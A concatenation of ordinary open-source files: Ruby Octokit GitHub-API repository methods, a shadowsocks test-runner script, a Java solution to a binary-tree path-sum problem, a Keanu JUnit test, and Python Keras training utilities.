# @see https://developer.github.com/v3/activity/starring/#unstar-a-repository
def unstar(repo, options = {})
boolean_from_response :delete, "user/starred/#{Repository.new(repo)}", options
end
# Watch a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully watched
# @deprecated Use #star instead
# @see https://developer.github.com/v3/activity/watching/#watch-a-repository-legacy
def watch(repo, options = {})
boolean_from_response :put, "user/watched/#{Repository.new(repo)}", options
end
# Unwatch a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully unwatched
# @deprecated Use #unstar instead
# @see https://developer.github.com/v3/activity/watching/#stop-watching-a-repository-legacy
def unwatch(repo, options = {})
boolean_from_response :delete, "user/watched/#{Repository.new(repo)}", options
end
# Fork a repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Repository info for the new fork
# @see https://developer.github.com/v3/repos/forks/#create-a-fork
def fork(repo, options = {})
post "#{Repository.path repo}/forks", options
end
# Create a repository for a user or organization
#
# @param name [String] Name of the new repo
# @option options [String] :description Description of the repo
# @option options [String] :homepage Home page of the repo
# @option options [String] :private `true` makes the repository private, and `false` makes it public.
# @option options [String] :has_issues `true` enables issues for this repo, `false` disables issues.
# @option options [String] :has_wiki `true` enables wiki for this repo, `false` disables wiki.
# @option options [String] :has_downloads `true` enables downloads for this repo, `false` disables downloads.
# @option options [String] :organization Short name for the org under which to create the repo.
# @option options [Integer] :team_id The id of the team that will be granted access to this repository. This is only valid when creating a repo in an organization.
# @option options [Boolean] :auto_init `true` to create an initial commit with empty README. Default is `false`.
# @option options [String] :gitignore_template Desired language or platform .gitignore template to apply. Ignored if auto_init parameter is not provided.
# @return [Sawyer::Resource] Repository info for the new repository
# @see https://developer.github.com/v3/repos/#create
def create_repository(name, options = {})
organization = options.delete :organization
options.merge! :name => name
if organization.nil?
post 'user/repos', options
else
post "#{Organization.path organization}/repos", options
end
end
alias :create_repo :create_repository
alias :create :create_repository
# Delete repository
#
# Note: If OAuth is used, 'delete_repo' scope is required
#
# @see https://developer.github.com/v3/repos/#delete-a-repository
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if repository was deleted
def delete_repository(repo, options = {})
boolean_from_response :delete, Repository.path(repo), options
end
alias :delete_repo :delete_repository
# Hide a public repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Updated repository info
def set_private(repo, options = {})
# GitHub Api for setting private updated to use private attr, rather than public
update_repository repo, options.merge({ :private => true })
end
# Unhide a private repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Updated repository info
def set_public(repo, options = {})
# GitHub Api for setting private updated to use private attr, rather than public
update_repository repo, options.merge({ :private => false })
end
# Get deploy keys on a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Array<Sawyer::Resource>] Array of hashes representing deploy keys.
# @see https://developer.github.com/v3/repos/keys/#list
# @example
# @client.deploy_keys('octokit/octokit.rb')
# @example
# @client.list_deploy_keys('octokit/octokit.rb')
def deploy_keys(repo, options = {})
paginate "#{Repository.path repo}/keys", options
end
alias :list_deploy_keys :deploy_keys
# Get a single deploy key for a repo
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Deploy key ID.
# @return [Sawyer::Resource] Deploy key.
# @see https://developer.github.com/v3/repos/keys/#get
# @example
# @client.deploy_key('octokit/octokit.rb', 8675309)
def deploy_key(repo, id, options={})
get "#{Repository.path repo}/keys/#{id}", options
end
# Add deploy key to a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param title [String] Title reference for the deploy key.
# @param key [String] Public key.
# @return [Sawyer::Resource] Hash representing newly added key.
# @see https://developer.github.com/v3/repos/keys/#create
# @example
# @client.add_deploy_key('octokit/octokit.rb', 'Staging server', 'ssh-rsa AAA...')
def add_deploy_key(repo, title, key, options = {})
post "#{Repository.path repo}/keys", options.merge(:title => title, :key => key)
end
# Edit a deploy key
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Deploy key ID.
# @param options [Hash] Attributes to edit.
# @option title [String] Key title.
# @option key [String] Public key.
# @return [Sawyer::Resource] Updated deploy key.
# @deprecated This method is no longer supported in the API
# @see https://developer.github.com/changes/2014-02-24-finer-grained-scopes-for-ssh-keys/
# @see https://developer.github.com/v3/repos/keys/#edit
# @example Update the key for a deploy key.
# @client.edit_deploy_key('octokit/octokit.rb', 8675309, :key => 'ssh-rsa BBB...')
# @example
# @client.update_deploy_key('octokit/octokit.rb', 8675309, :title => 'Uber', :key => 'ssh-rsa BBB...'))
def edit_deploy_key(repo, id, options)
patch "#{Repository.path repo}/keys/#{id}", options
end
alias :update_deploy_key :edit_deploy_key
# Remove deploy key from a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Id of the deploy key to remove.
# @return [Boolean] True if key removed, false otherwise.
# @see https://developer.github.com/v3/repos/keys/#delete
# @example
# @client.remove_deploy_key('octokit/octokit.rb', 100000)
def remove_deploy_key(repo, id, options = {})
boolean_from_response :delete, "#{Repository.path repo}/keys/#{id}", options
end
# List collaborators
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing collaborating users.
# @see https://developer.github.com/v3/repos/collaborators/#list
# @example
# Octokit.collaborators('octokit/octokit.rb')
# @example
# Octokit.collabs('octokit/octokit.rb')
# @example
# @client.collabs('octokit/octokit.rb')
def collaborators(repo, options = {})
paginate "#{Repository.path repo}/collaborators", options
end
alias :collabs :collaborators
# Add collaborator to repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to add.
# @return [Boolean] True if collaborator added, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#add-collaborator
# @example
# @client.add_collaborator('octokit/octokit.rb', 'holman')
# @example
# @client.add_collab('octokit/octokit.rb', 'holman')
def add_collaborator(repo, collaborator, options = {})
boolean_from_response :put, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
alias :add_collab :add_collaborator
# Remove collaborator from repo.
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to remove.
# @return [Boolean] True if collaborator removed, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#remove-collaborator
# @example
# @client.remove_collaborator('octokit/octokit.rb', 'holman')
# @example
# @client.remove_collab('octokit/octokit.rb', 'holman')
def remove_collaborator(repo, collaborator, options = {})
boolean_from_response :delete, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
alias :remove_collab :remove_collaborator
# Checks if a user is a collaborator for a repo.
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to check.
# @return [Boolean] True if user is a collaborator, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#get
# @example
# @client.collaborator?('octokit/octokit.rb', 'holman')
def collaborator?(repo, collaborator, options={})
boolean_from_response :get, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
# List teams for a repo
#
# Requires authenticated client that is an owner or collaborator of the repo.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing teams.
# @see https://developer.github.com/v3/repos/#list-teams
# @example
# @client.repository_teams('octokit/pengwynn')
# @example
# @client.repo_teams('octokit/pengwynn')
# @example
# @client.teams('octokit/pengwynn')
def repository_teams(repo, options = {})
paginate "#{Repository.path repo}/teams", options
end
alias :repo_teams :repository_teams
alias :teams :repository_teams
# List contributors to a repo
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param anon [Boolean] Set true to include anonymous contributors.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/repos/#list-contributors
# @example
# Octokit.contributors('octokit/octokit.rb', true)
# @example
# Octokit.contribs('octokit/octokit.rb')
# @example
# @client.contribs('octokit/octokit.rb')
def contributors(repo, anon = nil, options = {})
options[:anon] = 1 if anon.to_s[/1|true/]
paginate "#{Repository.path repo}/contributors", options
end
alias :contribs :contributors
# List stargazers of a repo
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/activity/starring/#list-stargazers
# @example
# Octokit.stargazers('octokit/octokit.rb')
# @example
# @client.stargazers('octokit/octokit.rb')
def stargazers(repo, options = {})
paginate "#{Repository.path repo}/stargazers", options
end
# @deprecated Use {#stargazers} instead
#
# List watchers of repo.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/repos/watching/#list-watchers
# @example
# Octokit.watchers('octokit/octokit.rb')
# @example
# @client.watchers('octokit/octokit.rb')
def watchers(repo, options = {})
paginate "#{Repository.path repo}/watchers", options
end
# List forks
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing repos.
# @see https://developer.github.com/v3/repos/forks/#list-forks
# @example
# Octokit.forks('octokit/octokit.rb')
# @example
# Octokit.network('octokit/octokit.rb')
# @example
# @client.forks('octokit/octokit.rb')
def forks(repo, options = {})
paginate "#{Repository.path repo}/forks", options
end
alias :network :forks
# List languages of code in the repo.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of Hashes representing languages.
# @see https://developer.github.com/v3/repos/#list-languages
# @example
# Octokit.languages('octokit/octokit.rb')
# @example
# @client.languages('octokit/octokit.rb')
def languages(repo, options = {})
paginate "#{Repository.path repo}/languages", options
end
# List tags
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing tags.
# @see https://developer.github.com/v3/repos/#list-tags
# @example
# Octokit.tags('octokit/octokit.rb')
# @example
# @client.tags('octokit/octokit.rb')
def tags(repo, options = {})
paginate "#{Repository.path repo}/tags", options
end
# List branches
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing branches.
# @see https://developer.github.com/v3/repos/#list-branches
# @example
# Octokit.branches('octokit/octokit.rb')
# @example
# @client.branches('octokit/octokit.rb')
def branches(repo, options = {})
paginate "#{Repository.path repo}/branches", options
end
# Get a single branch from a repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @return [Sawyer::Resource] The branch requested, if it exists
# @see https://developer.github.com/v3/repos/#get-branch
      # @example Get branch 'master' from octokit/octokit.rb
# Octokit.branch("octokit/octokit.rb", "master")
def branch(repo, branch, options = {})
get "#{Repository.path repo}/branches/#{branch}", options
end
alias :get_branch :branch
# Lock a single branch from a repository
#
# Requires authenticated client
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @param required_status_checks [Hash]
# @return [Sawyer::Resource] The protected branch
# @see https://developer.github.com/v3/repos/#enabling-and-disabling-branch-protection
# @example
# @client.protect_branch('octokit/octokit.rb', 'master', foo)
def protect_branch(repo, branch, required_status_checks = {}, options = {})
if !required_status_checks.empty?
required_status_checks = { :required_status_checks => required_status_checks }
end
protection = { :protection => { :enabled => true }.merge(required_status_checks) }
options = ensure_api_media_type(:branch_protection, options.merge(protection))
patch "#{Repository.path repo}/branches/#{branch}", options
end
# Unlock a single branch from a repository
#
# Requires authenticated client
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @return [Sawyer::Resource] The unprotected branch
# @see https://developer.github.com/v3/repos/#enabling-and-disabling-branch-protection
# @example
# @client.unprotect_branch('octokit/octokit.rb', 'master')
def unprotect_branch(repo, branch, options = {})
protection = { :protection => { :enabled => false } }
options = ensure_api_media_type(:branch_protection, options.merge(protection))
patch "#{Repository.path repo}/branches/#{branch}", options
end
# List users available for assigning to issues.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/issues/assignees/#list-assignees
# @example
# Octokit.repository_assignees('octokit/octokit.rb')
# @example
# Octokit.repo_assignees('octokit/octokit.rb')
# @example
# @client.repository_assignees('octokit/octokit.rb')
def repository_assignees(repo, options = {})
paginate "#{Repository.path repo}/assignees", options
end
alias :repo_assignees :repository_assignees
# Check to see if a particular user is an assignee for a repository.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param assignee [String] User login to check
# @return [Boolean] True if assignable on project, false otherwise.
# @see https://developer.github.com/v3/issues/assignees/#check-assignee
# @example
# Octokit.check_assignee('octokit/octokit.rb', 'andrew')
def check_assignee(repo, assignee, options = {})
boolean_from_response :get, "#{Repository.path repo}/assignees/#{assignee}", options
end
# List watchers subscribing to notifications for a repo
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of users watching.
# @see https://developer.github.com/v3/activity/watching/#list-watchers
# @example
# @client.subscribers("octokit/octokit.rb")
def subscribers(repo, options = {})
paginate "#{Repository.path repo}/subscribers", options
end
# Get a repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Sawyer::Resource] Repository subscription.
# @see https://developer.github.com/v3/activity/watching/#get-a-repository-subscription
# @example
# @client.subscription("octokit/octokit.rb")
def subscription(repo, options = {})
get "#{Repository.path repo}/subscription", options
end
# Update repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param options [Hash]
#
# @option options [Boolean] :subscribed Determines if notifications
# should be received from this repository.
      # @option options [Boolean] :ignored Determines if all notifications
# should be blocked from this repository.
# @return [Sawyer::Resource] Updated repository subscription.
# @see https://developer.github.com/v3/activity/watching/#set-a-repository-subscription
# @example Subscribe to notifications for a repository
# @client.update_subscription("octokit/octokit.rb", {subscribed: true})
def update_subscription(repo, options = {})
put "#{Repository.path repo}/subscription", options
end
# Delete a repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Boolean] True if subscription deleted, false otherwise.
# @see https://developer.github.com/v3/activity/watching/#delete-a-repository-subscription
#
# @example
# @client.delete_subscription("octokit/octokit.rb")
def delete_subscription(repo, options = {})
boolean_from_response :delete, "#{Repository.path repo}/subscription", options
end
end
end
end
| {
"pile_set_name": "Github"
} |
#!/bin/bash
result=0
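# Note: $command is never assigned, so `$command "$@"` inside run_test expands to just the
# arguments passed in, which are executed as the test command. A failing test sets result=1,
# but run_test always returns 0 so the remaining tests still run.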
function run_test {
printf '\e[0;36m'
echo "running test: $command $@"
printf '\e[0m'
$command "$@"
status=$?
if [ $status -ne 0 ]; then
printf '\e[0;31m'
echo "test failed: $command $@"
printf '\e[0m'
echo
result=1
else
printf '\e[0;32m'
echo OK
printf '\e[0m'
echo
fi
return 0
}
python --version
coverage erase
mkdir tmp
run_test pep8 --ignore=E402 .
run_test pyflakes .
run_test coverage run tests/nose_plugin.py -v
run_test python setup.py sdist
run_test tests/test_daemon.sh
run_test python tests/test.py --with-coverage -c tests/aes.json
run_test python tests/test.py --with-coverage -c tests/aes-ctr.json
run_test python tests/test.py --with-coverage -c tests/aes-cfb1.json
run_test python tests/test.py --with-coverage -c tests/aes-cfb8.json
run_test python tests/test.py --with-coverage -c tests/rc4-md5.json
run_test python tests/test.py --with-coverage -c tests/salsa20.json
run_test python tests/test.py --with-coverage -c tests/chacha20.json
run_test python tests/test.py --with-coverage -c tests/table.json
run_test python tests/test.py --with-coverage -c tests/server-multi-ports.json
run_test python tests/test.py --with-coverage -s tests/aes.json -c tests/client-multi-server-ip.json
run_test python tests/test.py --with-coverage -s tests/server-multi-passwd.json -c tests/server-multi-passwd-client-side.json
run_test python tests/test.py --with-coverage -c tests/workers.json
run_test python tests/test.py --with-coverage -s tests/ipv6.json -c tests/ipv6-client-side.json
run_test python tests/test.py --with-coverage -b "-m rc4-md5 -k testrc4 -s 127.0.0.1 -p 8388 -q" -a "-m rc4-md5 -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -vv"
run_test python tests/test.py --with-coverage -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --workers 1" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -qq -b 127.0.0.1"
run_test python tests/test.py --with-coverage --should-fail --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --forbidden-ip=127.0.0.1,::1,8.8.8.8" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
# test if DNS works
run_test python tests/test.py --with-coverage -c tests/aes.json --url="https://clients1.google.com/generate_204"
# test localhost is in the forbidden list by default
run_test python tests/test.py --with-coverage --should-fail --tcp-only --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
# test localhost is available when forbidden list is empty
run_test python tests/test.py --with-coverage --tcp-only --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --forbidden-ip=" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
if [ -f /proc/sys/net/ipv4/tcp_fastopen ] ; then
if [ 3 -eq `cat /proc/sys/net/ipv4/tcp_fastopen` ] ; then
# we have to run it twice:
# the first time there's no syn cookie
# the second time there is syn cookie
run_test python tests/test.py --with-coverage -c tests/fastopen.json
run_test python tests/test.py --with-coverage -c tests/fastopen.json
fi
fi
run_test tests/test_large_file.sh
run_test tests/test_udp_src.sh
run_test tests/test_command.sh
coverage combine && coverage report --include=shadowsocks/*
rm -rf htmlcov
rm -rf tmp
coverage html --include=shadowsocks/*
coverage report --include=shadowsocks/* | tail -n1 | rev | cut -d' ' -f 1 | rev > /tmp/shadowsocks-coverage
exit $result
| {
"pile_set_name": "Github"
} |
# Paths with Sum II
You are given a binary tree in which each node contains an integer value (which might be positive or negative). Design an algorithm to count the number of paths that sum to a given value. The path does not need to start or end at the root or a leaf, but it must go downwards (traveling only from parent nodes to child nodes).
## Solution
For now, only a brute-force approach comes to mind (an optimized prefix-sum variant is sketched after the code below).
## Code
```java
// Brute Force
int countPath(TreeNode root, int sum){
if (root == null)
return 0;
int pathsRoot = countPathFromNode(root, sum, 0);
int pathsLeft = countPath(root.left, sum);
int pathsRight = countPath(root.right, sum);
return pathsRoot + pathsLeft + pathsRight;
}
int countPathFromNode(TreeNode node, int sum, int curSum){
if (node == null){
return 0;
}
curSum += node.data;
int totalPath = 0;
if (curSum == sum){
totalPath++;
}
totalPath += countPathFromNode(node.left, sum, curSum);
totalPath += countPathFromNode(node.right, sum, curSum);
return totalPath;
}
```
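A possible follow-up, not part of the original write-up: the brute-force version revisits the same nodes once per ancestor, so it runs in O(N log N) on a balanced tree and O(N^2) in the worst case. A common optimization carries a running sum downward and counts, in a hash map, how many ancestor running sums differ from the current one by exactly `sum`; each node is then visited once (O(N) time, O(N) extra space). The sketch below assumes the same `TreeNode` shape (`data`, `left`, `right`) used above.
```java
import java.util.HashMap;

// Prefix-sum sketch: count, at every node, how many ancestor running sums
// equal (current running sum - sum); each such ancestor starts a valid path.
int countPathsWithSum(TreeNode root, int sum) {
    return countPathsWithSum(root, sum, 0, new HashMap<Integer, Integer>());
}

int countPathsWithSum(TreeNode node, int sum, int runningSum,
                      HashMap<Integer, Integer> pathCount) {
    if (node == null)
        return 0;

    runningSum += node.data;
    int totalPaths = pathCount.getOrDefault(runningSum - sum, 0);
    if (runningSum == sum)          // path that starts at the root
        totalPaths++;

    incrementHashTable(pathCount, runningSum, 1);   // add before recursing
    totalPaths += countPathsWithSum(node.left, sum, runningSum, pathCount);
    totalPaths += countPathsWithSum(node.right, sum, runningSum, pathCount);
    incrementHashTable(pathCount, runningSum, -1);  // remove on the way back up

    return totalPaths;
}

void incrementHashTable(HashMap<Integer, Integer> hashTable, int key, int delta) {
    int newCount = hashTable.getOrDefault(key, 0) + delta;
    if (newCount == 0)
        hashTable.remove(key);      // keep the map small
    else
        hashTable.put(key, newCount);
}
```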
| {
"pile_set_name": "Github"
} |
package io.improbable.keanu.vertices.tensor.number.floating.dbl.nonprobabilistic.diff;
import io.improbable.keanu.distributions.hyperparam.Diff;
import io.improbable.keanu.distributions.hyperparam.Diffs;
import io.improbable.keanu.tensor.dbl.DoubleTensor;
import org.junit.Before;
import org.junit.Test;
import java.util.NoSuchElementException;
import static io.improbable.keanu.distributions.hyperparam.Diffs.MU;
import static org.junit.Assert.assertTrue;
public class DiffTest {
Diffs diffs;
@Before
public void initialiseDiffs() {
diffs = new Diffs();
}
@Test
public void youCanGetADiffByName() {
DoubleTensor muDiffValue = DoubleTensor.scalar(0.1);
diffs.put(MU, muDiffValue);
Diff mu = diffs.get(MU);
assertTrue(mu.getName().equals(MU.getName()));
assertTrue(mu.getValue() == muDiffValue);
}
@Test(expected = NoSuchElementException.class)
public void itThrowsIfYouAskForAValueThatsAbsent() {
diffs.get(MU);
}
@Test(expected = IllegalArgumentException.class)
public void itThrowsIfYouTryToAddTheSameDiffTwice() {
DoubleTensor muDiffValue = DoubleTensor.scalar(0.1);
diffs.put(MU, muDiffValue);
diffs.put(MU, muDiffValue);
}
@Test(expected = IllegalArgumentException.class)
public void itThrowsIfYouTryToAddTwoDiffsWithTheSameName() {
diffs.put(MU, DoubleTensor.scalar(0.1));
diffs.put(MU, DoubleTensor.scalar(0.2));
}
}
| {
"pile_set_name": "Github"
} |
import os
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import GridSearchCV, train_test_split
from skimage.transform import resize
import warnings
from keras.models import Model
from keras.layers import Permute
from keras.optimizers import Adam
from keras.utils import to_categorical
from keras.preprocessing.sequence import pad_sequences
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler
from keras.wrappers.scikit_learn import KerasClassifier
from keras import backend as K
from utils.generic_utils import load_dataset_at, calculate_dataset_metrics, cutoff_choice, \
cutoff_sequence, plot_dataset
from utils.constants import MAX_SEQUENCE_LENGTH_LIST, TRAIN_FILES
mpl.style.use('seaborn-paper')
warnings.simplefilter('ignore', category=DeprecationWarning)
if not os.path.exists('weights/'):
os.makedirs('weights/')
def train_model(model: Model, dataset_id, dataset_prefix, epochs=50, batch_size=128, val_subset=None,
cutoff=None, normalize_timeseries=False, learning_rate=1e-3):
"""
Trains a provided Model, given a dataset id.
Args:
model: A Keras Model.
        dataset_id: Integer id representing the dataset index contained in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
epochs: Number of epochs to train.
batch_size: Size of each batch for training.
val_subset: Optional integer id to subset the test set. To be used if
the test set evaluation time significantly surpasses training time
per epoch.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
learning_rate: Initial learning rate.
"""
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
max_nb_words, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
if not is_timeseries:
X_train = pad_sequences(X_train, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
X_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
classes = np.unique(y_train)
le = LabelEncoder()
y_ind = le.fit_transform(y_train.ravel())
recip_freq = len(y_train) / (len(le.classes_) *
np.bincount(y_ind).astype(np.float64))
class_weight = recip_freq[le.transform(classes)]
print("Class weights : ", class_weight)
y_train = to_categorical(y_train, len(np.unique(y_train)))
y_test = to_categorical(y_test, len(np.unique(y_test)))
if is_timeseries:
factor = 1. / np.cbrt(2)
else:
factor = 1. / np.sqrt(2)
path_splits = os.path.split(dataset_prefix)
if len(path_splits) > 1:
base_path = os.path.join('weights', *path_splits)
if not os.path.exists(base_path):
os.makedirs(base_path)
base_path = os.path.join(base_path, path_splits[-1])
else:
all_weights_path = os.path.join('weights', dataset_prefix)
if not os.path.exists(all_weights_path):
os.makedirs(all_weights_path)
model_checkpoint = ModelCheckpoint("./weights/%s_weights.h5" % dataset_prefix, verbose=1,
monitor='loss', save_best_only=True, save_weights_only=True)
reduce_lr = ReduceLROnPlateau(monitor='loss', patience=100, mode='auto',
factor=factor, cooldown=0, min_lr=1e-4, verbose=2)
callback_list = [model_checkpoint, reduce_lr]
optm = Adam(lr=learning_rate)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
if val_subset is not None:
X_test = X_test[:val_subset]
y_test = y_test[:val_subset]
model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs, callbacks=callback_list,
class_weight=class_weight, verbose=2, validation_data=(X_test, y_test))
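# Hypothetical usage sketch (names are assumptions, not part of this module): assumes a model
# builder such as generate_model() exists elsewhere in the repo and that dataset index 0 is
# defined in utils/constants.py.
# model = generate_model()
# train_model(model, dataset_id=0, dataset_prefix='dataset_0', epochs=100, batch_size=128,
#             normalize_timeseries=True)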
def evaluate_model(model: Model, dataset_id, dataset_prefix, batch_size=128, test_data_subset=None,
cutoff=None, normalize_timeseries=False):
"""
Evaluates a given Keras Model on the provided dataset.
Args:
model: A Keras Model.
        dataset_id: Integer id representing the dataset index contained in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
batch_size: Size of each batch for evaluation.
test_data_subset: Optional integer id to subset the test set. To be used if
            the test set evaluation time is significant.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
Returns:
The test set accuracy of the model.
"""
_, _, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
max_nb_words, sequence_length = calculate_dataset_metrics(X_test)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
_, X_test = cutoff_sequence(None, X_test, choice, dataset_id, sequence_length)
if not is_timeseries:
X_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
y_test = to_categorical(y_test, len(np.unique(y_test)))
optm = Adam(lr=1e-3)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
print("Weights loaded from ", "./weights/%s_weights.h5" % dataset_prefix)
if test_data_subset is not None:
X_test = X_test[:test_data_subset]
y_test = y_test[:test_data_subset]
print("\nEvaluating : ")
loss, accuracy = model.evaluate(X_test, y_test, batch_size=batch_size)
print()
print("Final Accuracy : ", accuracy)
return accuracy
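# Hypothetical usage sketch (same assumed names as the train_model example above):
# accuracy = evaluate_model(model, dataset_id=0, dataset_prefix='dataset_0', batch_size=128,
#                           normalize_timeseries=True)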
def loss_model(model: Model, dataset_id, dataset_prefix, batch_size=128, train_data_subset=None,
cutoff=None, normalize_timeseries=False):
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
y_train = to_categorical(y_train, len(np.unique(y_train)))
optm = Adam(lr=1e-3)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
print("Weights loaded from ", "./weights/%s_weights.h5" % dataset_prefix)
if train_data_subset is not None:
X_train = X_train[:train_data_subset]
y_train = y_train[:train_data_subset]
print("\nEvaluating : ")
loss, accuracy = model.evaluate(X_train, y_train, batch_size=batch_size)
print()
print("Final Loss : ", loss)
return loss
def set_trainable(layer, value):
"""
Sets the layers of the Model to be trainable or not.
Args:
layer: can be a single Layer of a Model, or an entire Model.
value: True or False.
"""
layer.trainable = value
# case: container
if hasattr(layer, 'layers'):
for l in layer.layers:
set_trainable(l, value)
# case: wrapper (which is a case not covered by the PR)
if hasattr(layer, 'layer'):
set_trainable(layer.layer, value)
def build_function(model, layer_names=None, outputs=None):
"""
Builds a Keras Function which retrieves the output of a Layer.
Args:
model: Keras Model.
layer_names: Name of the layer whose output is required.
outputs: Output tensors.
Returns:
List of Keras Functions.
"""
inp = model.input
